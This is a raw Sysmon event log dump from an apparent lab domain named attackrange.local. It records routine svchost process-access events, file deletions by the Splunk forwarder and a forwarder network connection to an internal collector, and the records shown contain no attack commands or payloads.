12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441660Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441659Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441658Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441657Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441656Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441655Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441654Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441653Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441652Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.451{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441651Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441650Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441649Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441648Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441647Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441646Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441645Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441644Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441643Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441642Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441641Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441640Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441639Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441638Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441637Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.450{42DC5269-CE99-6086-0D00-00000000BA01}900920C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441636Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.279{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441635Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.279{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441634Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:53.008{42DC5269-CE99-6086-1000-00000000BA01}364NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B512099F5DE7C8E18BE630780B6BA2E9,SHA256=6386D02F0367008648D3B7A1D25B33138535A77F0C46D4E7D41DE8BAE37B256F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441670Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:54.280{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441669Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:54.280{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441668Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:54.205{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=971B0CF589651A6675F8D64A56A9BB8B,SHA256=1495B36F458DB72D5F30E656D5687ECD6E94DB987873B67D96A9CC616C5DD7F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293308Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:54.023{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6A880B468F59C89F903A95C16A3E599,SHA256=430655108BCA3E09B76134C5775D159C2E3FEFDDCC75A1E48FBAF49EC508B034,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293312Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:53.455{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50665-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000293311Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:55.173{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DADD97E1E006BB16F7503CAB239DD2B,SHA256=800623C420CCFB833D05B2AA6C85EBE94813D453CA3083EF5B3ADCA171B09620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293310Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:55.173{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C5258945B007A31907259A549CA1976,SHA256=6D88630B6A68A080124926B05B002B28143E9DBBEB38F8E78579FF0601A870F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293309Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:55.042{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 